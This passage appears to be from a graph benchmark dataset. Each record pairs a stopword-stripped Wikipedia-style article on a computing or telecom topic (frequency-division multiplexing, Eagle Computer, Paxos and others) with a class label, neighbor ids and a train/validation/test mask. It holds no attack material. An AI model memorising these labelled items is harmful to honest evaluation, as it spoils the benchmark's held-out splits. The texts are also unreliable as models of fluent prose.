passband channel similarly additional baseband signals used modulate carriers frequencies creating channels information carriers spaced far enough apart frequency band frequencies occupied channel passbands separate channels overlap channels sent transmission medium coaxial cable optical fiber air using radio transmitter long channel frequencies spaced far enough apart none passbands overlap separate channels interfere thus available bandwidth divided slots channels carry separate modulated signal example coaxial cable used cable television systems bandwidth 1000 mhz passband television channel 6 mhz wide room many channels cable modern digital cable systems channel turn subdivided subchannels carry 10 digital television channels destination end cable fiber radio receiver channel local oscillator produces signal carrier frequency channel mixed incoming modulated signal frequencies subtract producing baseband signal channel called demodulation resulting baseband signal filtered frequencies output user long distance telephone connections 20th century telephone companies used l-carrier similar coaxial cable systems carrying thousands voice circuits multiplexed multiple stages channel banks shorter distances cheaper balanced pair cables used various systems including bell system k- n-carrier cables n't allow large bandwidths 12 voice channels double sideband later 24 single sideband multiplexed four wires one pair direction repeaters every several miles approximately 10 km see 12-channel carrier system end 20th century fdm voice circuits become rare modern telephone systems employ digital transmission time-division multiplexing tdm used instead fdm since late 20th century digital subscriber lines dsl used discrete multitone dmt system divide spectrum frequency channels concept corresponding frequency-division multiplexing optical domain known wavelength-division multiplexing commonplace fdm system used example l-carrier uses crystal filters operate 8 mhz range form channel group 12 channels 48 khz bandwidth range 8140 8188 khz selecting carriers range 8140 8184 khz selecting upper sideband group translated standard range 60 108 khz carrier 8248 khz systems used dtl direct line dfsg directly formed super group 132 voice channels 2sg 1g formed using dtl plane modulation frequency plan given fig1 fig2 use dtl technique allows formation maximum 132 voice channels placed direct line dtl eliminates group super group equipment dfsg take similar steps direct formation number super groups obtained 8 khz dfsg also eliminates group equipment offer dtl dfsg fit requirement low density system using dtl higher density system using dfsg dfsg terminal similar dtl terminal except instead two super groups many super groups combined mastergroup 600 channels 10 super-groups example based dfsg fdm also used combine signals final modulation onto carrier wave case carrier signals referred subcarriers example stereo fm transmission 38 khz subcarrier used separate left-right difference signal central left-right sum channel prior frequency modulation composite signal analog ntsc television channel divided subcarrier frequencies video color audio dsl uses different frequencies voice upstream downstream data transmission conductors also example frequency duplex frequency-division multiplexing used allow multiple users share physical communications channel called frequency-division multiple access fdma fdma traditional way separating radio signals different transmitters 1860s 70s several inventors attempted fdm names acoustic telegraphy harmonic telegraphy practical fdm achieved electronic age meanwhile efforts led elementary understanding electroacoustic technology resulting invention telephone",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      2057,
      10381,
      1550,
      6290,
      11288,
      2458,
      5020,
      5664,
      11686,
      1192,
      5162,
      3115,
      7723,
      11181,
      1967,
      2992,
      1969,
      2994,
      5304,
      1083,
      448,
      3140,
      7108,
      9284,
      11591,
      5321,
      6857,
      2891,
      7498,
      3959,
      9296,
      3156,
      2911,
      3040,
      1121,
      2785,
      2787,
      3168,
      4068,
      5092,
      5863,
      2920,
      7400,
      8160,
      8811,
      1650,
      2802,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 7491,
    "label": 4,
    "text": "Hack.lu:hack.lu hack.lu also written hacklu yearly computer security conference held luxembourg brings together variety people interested information security organized computer incident response center luxembourg circl country cert private sector communes non-governmental entities first conference organized 2005 held 10th edition 2014 scope european information security conferences hack.lu one oldest conferences running conferences often provide day-long training sessions hack.lu chooses different model filling first days workshops enforcing strong focus practical things aim convention make bridge various actors computer security world discussing presenting topics like computer security privacy information technology cultural/technical implication society since first conference capture flag event organized recent years fluxfingers ruhr-university bochum event organizers 5th time 2014 event usually lasts 48h possibility participate remotely teams one person physically present able claim prize 400 people participated 2013",
    "neighbors": [
      7449,
      10190,
      10894,
      1017,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7492,
    "label": 2,
    "text": "List_of_open-source_mobile_phones:list open-source mobile phones list mobile phones open-source operating systems available mobile phones proprietary baseband chip gsm module open-source baseband project osmocombb project based illicit leaked source code calypso modem called freecalypso android-based devices appear list heavy use proprietary components particularly drivers applications numerous versions android lineageos successor now-defunct cyanogenmod freedom-respecting replicant installed large number phones after-market webos initially available proprietary license source code later released free license hp still open webos run webos devices sailfish os proprietary user interface atop mer software distribution main components make open mobile phone postmarketos ubports kde neon open-source distributions running existing smartphones originally running android maemo leste available nokia n900 motorola droid 4 possible home-build phone partially open hardware software arduinophone touchscreen mit diy cellphone segmented display use arduino open-hardware single-board computer added components piphone zerophone similar based raspberry pi",
    "neighbors": [
      1537,
      3585,
      2308,
      5637,
      6,
      6276,
      8196,
      9732,
      10884,
      11271,
      4364,
      9356,
      3089,
      1682,
      405,
      10393,
      5019,
      7579,
      6301,
      5406,
      4383,
      673,
      6178,
      3626,
      10109,
      7727,
      3248,
      7857,
      9266,
      7991,
      9784,
      1849,
      1083,
      2111,
      1728,
      5824,
      1602,
      10820,
      2759,
      11079,
      11337,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      8919,
      3162,
      5339,
      4957,
      607,
      2784,
      10080,
      2658,
      3300,
      8423,
      9064,
      3561,
      10215,
      6763,
      6508,
      2285,
      2925,
      495,
      10599,
      8433,
      5875,
      1524,
      2420,
      5369,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7493,
    "label": 8,
    "text": "Optimizely:optimizely optimizely american company makes customer experience optimization software companies optimizely platform technology provides a/b testing tools two versions web page compared performance multivariate testing optimizely also enables personalization may used making data-driven decisions personalization capability used serving online advertising company headquarters san francisco california offices amsterdam netherlands cologne germany london united kingdom sydney australia optimizely founded 2010 dan siroker pete koomen formerly google optimizely completed combinator program winter 2010 november 2010 optimizely closed us 1.2 million funding round angel investors company became cash flow positive 2011 may 2012 optimizely announced raised new funding battery ventures google ventures interwest partners april 2013 optimizely raised 28 million series round funding round led benchmark participation bain capital ventures optimizely existing investors battery ventures interwest partners google ventures benchmark peter fenton joined optimizely board directors part larger international expansion plan optimizely announced april 2013 launch platform nine additional languages danish dutch french german italian japanese portuguese spanish swedish april 17 optimizely held first opticon user conference announced launch new mobile app a/b testing software may 2014 optimizely raised 57 million series b funding round led andreessen horowitz participation benchmark bain capital ventures part round scott weiss general partner andreessen horowitz joined optimizely board directors october 2015 company released second product mobile website personalization month optimizely raised 58 million series c funding led index ventures participation firms andreessen horowitz bain capital ventures battery ventures benchmark capital citi ventures danhua capital salesforce ventures tenaya capital part round ilya fushman index joined optimizely board directors march 10 2016 optimizely laid 40 employees 10 workforce september 2016 company released optimizely x expanded solutions web experimentation personalization recommendations mobile full stack ott july 2017 jay larson replaced dan siroker company ceo pete koomen company cto 2012 co-founder dan joseph siroker became company executive chairman july 2017 optimizely experimentation platform called optimizely x tools web experimentation personalization recommendations mobile full stack over-the-top content optimization delivered software service saas model opticon user conference organized optimizely focused web experience optimization first opticon conference held april 17 2014 san francisco optimizely announced mobile a/b testing product second opticon conference held june 17 18 2015 also san francisco announced new personalization product marc andreessen keynote speaker",
    "neighbors": [
      10090,
      467,
      7493,
      679
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7494,
    "label": 9,
    "text": "James_G._Mitchell:james g. mitchell james george jim mitchell born 25 april 1943 canadian computer scientist worked programming language design implementation fortran watfor mesa euclid c++ java interactive programming systems dynamic interpretation compilation document preparation systems user interface design distributed transactional file systems distributed object-oriented operating systems also worked design hardware computer graphics high-level language execution audio input/output mitchell born kitchener ontario canada april 25 1943 grew cambridge ontario graduated degree mathematics university waterloo 1966 mitchell began working computers 1962 student university waterloo three undergraduates developed fast compiler fortran programming language known watfor waterloo fortran ibm 7040 computer project initiated professor j. wesley graham established waterloo early reputation centre software computer science research helping first generation computer science majors learn program graduated phd computer science carnegie-mellon university 1970 dissertation titled conversational programming lcc 1971-84 mitchell xerox palo alto research center eventually became xerox fellow 1980–81 senior visiting fellow university cambridge computer laboratory head research development acorn computers u.k. managed development first arm risc chip president acorn research centre palo alto california mitchell joined sun microsystems 1988 charge spring distributed object-oriented operating system research sun microsystems laboratories sunsoft subsidiary became vice president technology architecture javasoft division chief technology officer java consumer embedded products later vice president charge sun microsystems laboratories subsequently became principal investigator darpa/sun hpcs high productivity computing systems program oracle corporation acquired sun microsystems 2010 appointed vice president photonics interconnects packaging oracle labs march 1 2014 mitchell retired oracle labs board directors curci foundation funds research life sciences 1997 awarded j.w graham medal computing innovation university waterloo 2008 awarded fr norm choate cr distinguished alumni award st. jerome university",
    "neighbors": [
      1952,
      9665,
      8262,
      9964,
      5677,
      2830,
      242,
      7158,
      3960
    ],
    "mask": "None"
  },
  {
    "node_id": 7495,
    "label": 3,
    "text": "Eagle_Computer:eagle computer eagle computer los gatos california early microcomputer manufacturing company spun audio-visual laboratories avl first sold line popular cp/m computers highly praised computer magazines day ibm pc launched eagle produced eagle 1600 series ran ms-dos true clones became evident buying public wanted actual clones ibm pc even non-clone better features eagle responded line clones including portable eagle pcs always rated highly computer magazines avl eagle ii audio-visual connectors back separate company eagle sold eagle ii iii iv v computer models external scsi/sasi hard-disk boxes called file 10 file 40 first eagle computers produced audio visual labs avl company founded chuck kappenman new jersey early 1970s produce proprietary large-format multi-image equipment kappenman introduced world first microprocessor-controlled multi-image programming computers showpro iii v dedicated controllers 1980 avl introduced first non-dedicated controller eagle first eagle computer used 16 khz processor 5-inch disk drive online storage eagle ran procall pro grammable c omputer udio-visual l anguage l ibrary software writing cues control 30 ektagraphic projectors five 16 mm film projectors 20 auxiliary control points digital control data sourced via rca xlr-type audio connector rear unit avl proprietary clocktrak biphase digital timecode similar incompatible smpte timecode sourced control channel multitrack analog audio tape deck timed list events eagle synchronized clocktrak later versions procall included option using smpte timecode programmers abandoned clocktrak smpte multi-image programs began incorporate video two separate digital data streams output eagle also via rca xlr-type audio connectors telemetry streams called positrak controlled five external slide projector control devices also manufactured avl known doves dove units received biphase data eagle via audio cables interpreted eagle data streams control many three kodak ektagraphic projectors large screens compatible xenon-lamped projectors two dry-closure contacts per dove unit avl also made raven device similar dove comprehensive control single 16 mm film projector well numerous external control devices lighting sound video projectors sources etc avl eagles associated products properly set powered extremely reliable 1970s early 1990s products competitors reliable readily available avl became industry standard multi-image control equipment however development large-screen electronic media hdtv ushered era film-based multi-image productions cp/m eagles basic design except storage devices exception portable model keyboard formed removable lid could snapped main unit traveling attractive off-white case held entire computer top section held green monochrome monitor left one two full-height storage devices stacked one right anti-glare screen held place front monitor front top section shut black plastic bezel bezel snapped place back section held fan right behind drive enclosure silver label behind monitor company logo address model number serial number voltage frequency current bottom section projected forward keyboard top system logo inside clamshell main circuit board connected monitor drives keyboard ports cables underneath main board connected cables xebec hard-disk controller card back clamshell reset button two rs-232 serial ports labeled serial serial b centronics parallel port labeled parallel sasi port labeled parallel b brightness knob monitor on/off switch keyboard well-designed keys black white lettering besides full typewriter keyboard complete ten-key number pad right uncommon time labels front number keys typewriter keyboard keys number pad denoted function keys performed command mode bundled spellbinder software cpu whole line 4-mhz zilog z80a standard microprocessor day memory 64k ram standard cp/m 2.2 operating system could address 8-bit chip also available external hard-disk units called file 10 file 40 metal corvus boxes fan power switch back inside file 10 hard disk eagle iv eagle sasi card power supply file 40 32 mb hard disk eagle v. upgrade eagle iii instance user could buy file 40 connect parallel b port back eagle ribbon cable came turn file 40 turn eagle file 10 file 40 attached turned eagle ii iii turned computer booted hard disk external box even bootable floppy disk floppy-disk drive eagle iii file 10 attached hard-disk storage eagle iv two floppy-disk drives instead one similarly file 40 attached functionally eagle v extra floppy-disk drive original avl eagle s-100 8080 computer separate boards avl multi-image interface intel 8080 cpu floppy drive interface 16kb memory cards standard machines one extra 16kb memory boards available could afford one boot floppy offer run anything procall unless paid one run electric pencil word processor eagles easy open easy upgrade difference eagle eagle ii instance number floppy-disk drives adding right drives hard disk sasi card extra power supply could upgraded ii iii iv v iii could become iv v iv could become v. half-height floppy-disk drives hard disks became available eagle drives worn could replaced ones took less space drew less power eagle bios supported two double-sided floppy-disk drives four 8 mb hard-disk partitions systems could built two half-height floppies 10 20 32 mb hard disk system two floppies 10 mb hard disk jokingly called iv plus one 20 mb hard disk called 4 half however many floppies see whether would work eagle computer users group members mounted two half-height 10-mb hard disks eagle attached sasi card cards connected xebec controller iv two worked perfectly waste resources eagle sasi card rarest hardest-to-find part computer since eagle made eagles begin computer hobbyists continued improve cp/m various ways even digital research longer business computer said running z-system rather cp/m cp/m ccp replaced zcpr similar command processor bdos replaced zrdos z3dos could done manually source code bios available automatically various packages one long-term concern eagles loud hard disks seemed hunt whenever reading writing data nz-com alpha systems corporation allowed hard disk eagle iv run quickly quietly observation confirmed whenever eagle z-system installed software cp/m eagles came 5.25 floppy disks customers bought eagle iv eagle v file 10 file 40 software already installed bios cp/m consisted three parts two never changed copyrighted digital research third part bios interface operating system hardware varied systems different computer manufacturers sometimes different models company bios written manufacturer copyrighted company three eagle bioses disk formats format floppy disks hard disks defined bios every manufacturer cp/m computer eagle kept simple single-sided floppy-disk format double-sided one furthermore identical one side double-sided format filled whole first side like single-sided format continued second side efficient first writing one track one side disk one track moving drive head next track done deliberately make two formats alike possible customer upgraded ii iii iv v need copy old disks format new machine one hard-disk format format program required hard disk right number heads platters cylinders numerous makes models 10 20 32 mb hard disks met requirement program formatted hard disk 8 megabytes time cp/m limit logical disk drive successfully finished four partitions quit suddenly ran hard disk thus 10 mb hard disk 8 mb partition 2 mb partition 20 mb hard disk two 8 mb partitions one 4 mb partition 32 mb hard disk four 8 mb partitions iv 2 mentioned four partitions 8 mb 2 mb 8 mb 2 mb drive letters cp/m drive booted drive whether floppy disk hard disk addition double-sided eagles addressed single-sided floppies drive j drive letter applied device change given system modifying systems could confusing eagle booted file 10 file 40 file 20 file 10 file 40 box 20-mb hard disk inside drive-letter assignments hard-disk bios prevailed external hard disk partitions would b file 10 b c file 20 b c file 40 top floppy would e bottom one f j unless single-sided floppies could j since hard-disk bios addressed four hard-disk partitions eagle iv file 10 attached would address two partitions file 10 b two eagle c d. file 20 attached external partitions would b c 8 mb internal partition would internal partition could n't used similarly file 40 attached partitions hard disk eagle could read written available hard-disk partitions assigned file 40 utilities standard cp/m utilities included pip copy files etc dri sophisticated compiled basic programming language cbasic also included every cp/m computer manufacturer supplied additional software utilities much way linux distributions add installer etc standard kernel libraries eagles spellbinder lexisoft powerful word processor highly configurable even built-in programming language automating tasks eagle computers came version spellbinder already configured many functions already assigned keys keys labels fronts show spellbinder functions configuration needed set given printer printers meant choosing printer list combination spellbinder software eagle keyboard large storage capacity eagle floppies made word-processing machine powerful day many eagle owners never realized much computers capable eagles marketed business machines financial software part package originally accounting plus professional bookkeeping system large took six eagle double-sided 784 kb floppy disks hold required constant disk swapping eagle without hard disk constant protests questions requests customer support led eagle stop bundling accounting plus computers users simply n't need ultracalc spreadsheet program sorcim substituted later machines eagles early enough come accounting plus whether made avl eagle two black binders documentation one labeled accounting accounting plus manual binder labeled users guide contained everything else br procall programmable computer audio-visual language library see description software earlier article later eagles single white binder eagle logo across top spine eagle software manual along manual written eagle told use computer including spellbinder ultracalc without distinguishing eagle software lexisoft sorcim mentors eagle computer user group meetings would often explain fact separate programs computer written separate companies manual menu system looked like one big program new computer user thing documentation binder thin spiral-bound book called cp/m primer gave superficial idea operating system format disks using forth vendors would often throw digital research cp/m 2.2 user guide cbasic user guide good book cp/m mastering cp/m cp/m handbook mp/m n't part standard eagle documentation confusing marketing move eagle renamed 8-bit cp/m line time introduced first 16-bit computers prior change logo keyboard announced computer model eagle ii iii iv v. however eagle consolidated entire line eagle iie series resulted labels indicating differentiation five 8-bit models silver label back machine specified individual model iie-1 iie-2 iie-3 iie-4 iie-5 corresponding previously-named eagle ii iii iv v. causes failure may expected computer built way chips attached boards sockets rather soldered may loose expanded heat whenever computer long time contracted whenever computer turned computer used great deal long time may require new owner open gently press chips run another problem sometimes found old eagles hard disks stiction hard disk read/write heads era rested platter turned may adhere sitting greater force drive motor exert starting experienced technician may able coax head free without destroying hard disk losing data common problem peculiar cp/m eagles involves character generator chip main board tends fail age line text dots letters scattered unreadably screen problem became apparent chip longer made still available parts warehouses eagle 1600 series computers runs ms-dos fully pc compatible first pcs based fully 16-bit intel 8086 processor rather intel 8088 uses 16 bits internally 8-bit external interface eagle attempted create niche brand-new 16-bit market building machines easy use cp/m models intel cpu 640 kb ram memory almost pc time offer computers came ms-dos pc version spellbinder pc spreadsheet program documentation.they run many pc programs including lotus 1-2-3 concurrent cp/m-86 time pc programs recent ports cp/m little agreement standards fact 1600s ibm clones means games expect exactly video hardware ibm pc call pc hardware pc rom bios directly sake speed run ran poorly 1600 line also first computers ms-dos hard disks eagle achieved using hard-disk subsystem xebec hard-disk controller card eagle sasi card hard disk cp/m models subdirectories supported ms-dos version eagles used cp/m ms-dos offer cp/m 16 numbered user zones either limits usefulness hard disks eagle also one first manufacturers clones ibm pc eagle pc introduced 1982 enhanced 752 × 352 graphics compared ibm pc 640 × 200 resolution quieter need cooling fan pc 2 followed screen resolution downgraded match ibm pc later eagle spirit portable came eagle turbo spellbinder renamed eaglewriter eagle pcs spreadsheet program called eaglecalc actual changes made either program june 8 1983 day eagle initial public offering made multimillionaire president ceo dennis barnhart died crash ferrari test driving ronald mickwee became president ceo death underwriters reversed ipo refunding money investors paid stock held another ipo months later unprecedented pc industry dramatic timing led people suppose event caused end eagle company continued lead pc sales ibm launched lawsuit pc clone manufactures like eagle corona data systems handwell corporation claiming copyright infringement bios code companies named settled court agreeing re-implement bios way violate ibm copyrights led companies like phoenix technologies offer pc clone manufacturers bioses written following clean room design concomitantly lawsuits ibm slashed prices products discussing perspectives smaller pc firms like eagle one morgan stanley analyst quoted june 9 1984 issue new york times saying operating 5 percent pretax margins room price cuts eagle rewrote bios never regained lost sales pioneering effort time initiative launched create new market selling eagle systems china effort eventually fell company like many others affected bios copyright restrictions ultimately unable recover business 1986 eagle computer user group san jose california primary eagle user group drew attendees san francisco bay area monthly meetings eagle users united states paid dues got newsletter meetings generally consisted experienced eagle owners showing others use advanced features bundled software configuring printers actual presentations rare welcome another user group called screaming eagles two groups sent newsletters every month",
    "neighbors": [
      3522,
      10692,
      1515,
      1324,
      8301,
      9166,
      1776,
      3056,
      4337,
      6129,
      823,
      4409,
      6778,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 7496,
    "label": 2,
    "text": "Outline_of_iOS:outline ios following outline provided overview topical guide ios ios – mobile operating system developed distributed apple inc originally released 2007 iphone ipod touch since extended support apple devices ipad apple tv unlike windows ce mobile phone android apple license ios installation non-apple hardware history iphone",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      2673,
      2686,
      6783,
      10878,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      2282,
      9451,
      1772,
      7420,
      1290,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      321,
      1346,
      10562,
      4957,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      2023,
      7154
    ],
    "mask": "Test"
  },
  {
    "node_id": 7497,
    "label": 2,
    "text": "Supercomputer_operating_systems:supercomputer operating systems since end 20th century supercomputer operating systems undergone major transformations fundamental changes occurred supercomputer architecture early operating systems custom tailored supercomputer gain speed trend moving away in-house operating systems toward form linux running supercomputers top500 list november 2017 given modern massively parallel supercomputers typically separate computations services using multiple types nodes usually run different operating systems different nodes e.g. using small efficient lightweight kernel compute node kernel cnk compute node linux cnl compute nodes larger system linux-derivative server input/output i/o nodes traditional multi-user computer system job scheduling effect tasking problem processing peripheral resources massively parallel system job management system needs manage allocation computational communication resources well gracefully dealing inevitable hardware failures tens thousands processors present although modern supercomputers use linux operating system manufacturer made specific changes linux-derivative use industry standard exists partly differences hardware architectures require changes optimize operating system hardware design early days supercomputing basic architectural concepts evolving rapidly system software follow hardware innovations usually took rapid turns early systems operating systems custom tailored supercomputer gain speed yet rush develop serious software quality challenges surfaced many cases cost complexity system software development became much issue hardware 1980s cost software development cray came equal spent hardware trend partly responsible move away in-house operating systems adaptation generic software first wave operating system changes came mid 1980s vendor specific operating systems abandoned favor unix despite early skepticism transition proved successful early 1990s major changes occurring supercomputing system software time growing use unix begun change way system software viewed use high level language c implement operating system reliance standardized interfaces contrast assembly language oriented approaches past hardware vendors adapted unix systems new useful features added unix e.g. fast file systems tunable process schedulers however companies adapted unix made unique changes rather collaborating industry standard create unix supercomputers partly differences architectures required changes optimize unix architecture thus general purpose operating systems became stable supercomputers began borrow adapt critical system code relied rich set secondary functions came reinvent wheel however time size code general purpose operating systems growing rapidly time unix-based code reached 500,000 lines long maintenance use challenge resulted move use microkernels used minimal set operating system functions systems mach carnegie mellon university chorusos inria examples early microkernels separation operating system separate components became necessary supercomputers developed different types nodes e.g. compute nodes versus i/o nodes thus modern supercomputers usually run different operating systems different nodes e.g. using small efficient lightweight kernel cnk cnl compute nodes larger system linux-derivative server i/o nodes cdc 6600 generally considered first supercomputer world ran chippewa operating system deployed various cdc 6000 series computers chippewa rather simple job control oriented system derived earlier cdc 3000 influenced later kronos scope systems first cray 1 delivered los alamos lab operating system software los alamos developed application software operating system main timesharing system cray 1 cray time sharing system ctss developed livermore labs direct descendant livermore time sharing system ltss cdc 6600 operating system twenty years earlier developing supercomputers rising software costs soon became dominant evidenced 1980s cost software development cray growing equal cost hardware trend partly responsible move away in-house cray operating system unicos system based unix 1985 cray 2 first system ship unicos operating system around time eos operating system developed eta systems use eta10 supercomputers written cybil pascal-like language control data corporation eos highlighted stability problems developing stable operating systems supercomputers eventually unix-like system offered machine lessons learned developing eta system software included high level risk associated developing new supercomputer operating system advantages using unix large extant base system software libraries middle 1990s despite extant investment older operating systems trend toward use unix-based systems also facilitated use interactive graphical user interfaces guis scientific computing across multiple platforms move toward commodity os opponents cited fast pace focus linux development major obstacle adoption one author wrote linux likely catch large-scale systems nevertheless trend continued gain momentum 2005 virtually supercomputers used unix-like os variants unix included ibm aix open source linux system adaptations unicos cray end 20th century linux estimated command highest share supercomputing pie ibm blue gene supercomputer uses cnk operating system compute nodes uses modified linux-based kernel called i/o node kernel ink i/o nodes cnk lightweight kernel runs node supports single application running single user node sake efficient operation design cnk kept simple minimal physical memory statically mapped cnk neither needing providing scheduling context switching cnk even implement file i/o compute node delegates dedicated i/o nodes however given blue gene multiple compute nodes share single i/o node i/o node operating system require multi-tasking hence selection linux-based operating system traditional multi-user computer systems early supercomputers job scheduling effect task scheduling problem processing peripheral resources massively parallel system job management system needs manage allocation computational communication resources essential tune task scheduling operating system different configurations supercomputer typical parallel job scheduler master scheduler instructs number slave schedulers launch monitor control parallel jobs periodically receives reports status job progress supercomputer schedulers attempt maintain locality job execution pbs pro scheduler used cray xt3 cray xt4 systems attempt optimize locality three-dimensional torus interconnect simply uses first available processor hand ibm scheduler blue gene supercomputers aims exploit locality minimize network contention assigning tasks application one midplanes 8x8x8 node group slurm workload manager scheduler uses best fit algorithm performs hilbert curve scheduling optimize locality task assignments several modern supercomputers tianhe-2 use slurm arbitrates contention resources across system slurm open source linux-based scalable manage thousands nodes computer cluster sustained throughput 100,000 jobs per hour",
    "neighbors": [
      8447,
      7812,
      1031,
      7432,
      7561,
      3978,
      9991,
      1933,
      1168,
      785,
      10641,
      7187,
      7699,
      5397,
      11027,
      7963,
      6815,
      5798,
      9126,
      6184,
      2345,
      10411,
      4909,
      7983,
      7218,
      8242,
      8501,
      823,
      5948,
      4286,
      2113,
      8514,
      5956,
      11205,
      4423,
      1480,
      1866,
      8523,
      5452,
      4308,
      3197,
      344,
      2264,
      2394,
      731,
      2140,
      477,
      11517,
      11487,
      1761,
      4194,
      5090,
      7142,
      3055,
      6769,
      5492,
      7802,
      508,
      2045,
      2303
    ],
    "mask": "None"
  },
  {
    "node_id": 7498,
    "label": 5,
    "text": "Channel_access_method:channel access method telecommunications computer networks channel access method multiple access method allows two terminals connected transmission medium transmit share capacity examples shared physical media wireless networks bus networks ring networks point-to-point links operating half-duplex mode channel access method based multiplexing allows several data streams signals share communication channel transmission medium context multiplexing provided physical layer channel access method also based multiple access protocol control mechanism also known medium access control mac medium access control deals issues addressing assigning multiplex channels different users avoiding collisions media access control sub-layer data link layer osi model component link layer tcp/ip model channel access schemes generally fall following categories frequency-division multiple access fdma channel-access scheme based frequency-division multiplexing fdm scheme provides different frequency bands different data streams fdma case frequency bands allocated different nodes devices example fdma systems first-generation 1g cell-phone systems phone call assigned specific uplink frequency channel another downlink frequency channel message signal phone call modulated specific carrier frequency related technique wavelength division multiple access wdma based wavelength-division multiplexing wdm different data streams get different colors fiber-optical communications wdma case different network nodes bus hub network get different color advanced form fdma orthogonal frequency-division multiple access ofdma scheme example used 4g cellular communication systems ofdma node may use several sub-carriers making possible provide different quality service different data rates different users assignment sub-carriers users may changed dynamically based current radio channel conditions traffic load single-carrier fdma sc-fdma a.k.a linearly-precoded ofdma lp-ofdma based single-carrier frequency-domain-equalization sc-fde time-division multiple access tdma channel access scheme based time-division multiplexing tdm scheme tdma provides different time slots different transmitters cyclically repetitive frame structure example node 1 may use time slot 1 node 2 time slot 2 etc last transmitter starts advanced form dynamic tdma dtdma assignment transmitters time slots vary one frame multi-frequency time-division multiple access mf-tdma combines time frequency multiple access example 2g cellular systems based combination tdma fdma frequency channel divided eight time slots seven used seven phone calls one signalling data statistical time division multiplexing multiple access typically also based time-domain multiplexing cyclically repetitive frame structure due random character categorised statistical multiplexing methods capable dynamic bandwidth allocation requires media access control mac protocol i.e principle nodes take turns channel avoid collisions common examples csma/cd used ethernet bus networks hub networks csma/ca used wireless networks ieee 802.11 code division multiple access cdma scheme based spread spectrum meaning wider radio channel bandwidth used data rate individual bit streams requires several message signals transferred simultaneously carrier frequency utilizing different spreading codes per shannon–hartley theorem wide bandwidth makes possible send signal-to-noise ratio much less 1 less 0 db meaning transmission power reduced level level noise co-channel interference message signals sharing frequency range one form direct-sequence cdma ds-cdma based direct-sequence spread spectrum dsss used example 3g cell phone systems information bit symbol represented long code sequence several pulses called chips sequence spreading code message signal example phone call uses different spreading code another form frequency-hopping cdma fh-cdma based frequency-hopping spread spectrum fhss channel frequency changed rapidly according sequence constitutes spreading code example bluetooth communication system based combination frequency-hopping either csma/ca statistical time division multiplexing communication data communication applications tdma audio transmission nodes belonging user piconet use frequency hopping sequence synchronously meaning send frequency channel cdma/ca tdma used avoid collisions within vpan frequency-hopping used bluetooth reduce cross-talk collision probability nodes different vpans techniques include orthogonal frequency-hopping multiple access ofhma multi-carrier code division multiple access mc-cdma space-division multiple access sdma transmits different information different physical areas examples include simple cellular radio systems advanced cellular systems use directional antennas power modulation refine spatial transmission patterns power-division multiple access pdma scheme based using variable transmission power users order share available power channel examples include multiple scpc modems satellite transponder users get demand larger share power budget transmit higher data rates following examples packet mode channel access methods methods used dividing forward reverse communication channels known duplexing methods examples common statistical time-division multiplexing multiple access protocols wired multi-drop networks examples common multiple access protocols may used packet radio wireless networks note hybrids techniques frequently used examples local area networks lans metropolitan area networks mans multiple access methods enable bus networks ring networks hubbed networks wireless networks half duplex point-to-point communication required full duplex point-to-point serial lines network switches routers switched networks logical star topology common multiple access method csma/cd used ethernet although today ethernet installations typically switched csma/cd utilized anyway achieve compatibility hubs satellite communications multiple access capability communications satellite function portion communications link one pair satellite terminals concurrently three types multiple access presently used communications satellites code-division frequency-division time-division multiple access telecommunication switching centers multiple access connection user two switching centers separate access lines using single message routing indicator telephone number several ways categorizing multiple-access schemes protocols used literature example daniel minoli 2009 identifies five principal types multiple-access schemes fdma tdma cdma sdma random access r. rom m. sidi 1990 categorize protocols conflict-free access protocols aloha protocols carrier sensing protocols telecommunications handbook terplan morreale 2000 identifies following mac categories",
    "neighbors": [
      10112,
      4609,
      2306,
      388,
      8708,
      3847,
      2057,
      1550,
      10005,
      5270,
      11288,
      2458,
      5020,
      5664,
      1192,
      11560,
      7723,
      11181,
      1969,
      2994,
      7865,
      1083,
      7490,
      3140,
      9284,
      11591,
      5321,
      6857,
      5581,
      9038,
      4691,
      2911,
      3168,
      2785,
      8160,
      2787,
      5092,
      5863,
      7400,
      2802,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 7499,
    "label": 3,
    "text": "Paxos_(computer_science):paxos computer science paxos family protocols solving consensus network unreliable processors processors may fail consensus process agreeing one result among group participants problem becomes difficult participants communication medium may experience failures consensus protocols basis state machine replication approach distributed computing suggested leslie lamport surveyed fred schneider state machine replication technique converting algorithm fault-tolerant distributed implementation ad-hoc techniques may leave important cases failures unresolved principled approach proposed lamport et al ensures cases handled safely paxos protocol first published 1989 named fictional legislative consensus system used paxos island greece later published journal article 1998 paxos family protocols includes spectrum trade-offs number processors number message delays learning agreed value activity level individual participants number messages sent types failures although deterministic fault-tolerant consensus protocol guarantee progress asynchronous network result proved paper fischer lynch paterson paxos guarantees safety consistency conditions could prevent making progress difficult provoke paxos usually used durability required example replicate file database amount durable state could large protocol attempts make progress even periods bounded number replicas unresponsive also mechanism drop permanently failed replica add new replica topic predates protocol 1988 lynch dwork stockmeyer demonstrated solvability consensus broad family partially synchronous systems paxos strong similarities protocol used agreement viewstamped replication first published oki liskov 1988 context distributed transactions notwithstanding prior work paxos offered particularly elegant formalism included one earliest proofs safety fault-tolerant distributed consensus protocol reconfigurable state machines strong ties prior work reliable group multicast protocols support dynamic group membership example birman work 1985 1987 virtually synchronous gbcast protocol however noted gbcast unusual supporting durability addressing partitioning failures reliable multicast protocols lack properties required implementations state machine replication model point elaborated paper lamport malkhi zhou paxos protocols members theoretical class solutions problem formalized uniform agreement crash failures lower bounds problem proved keidar shraer 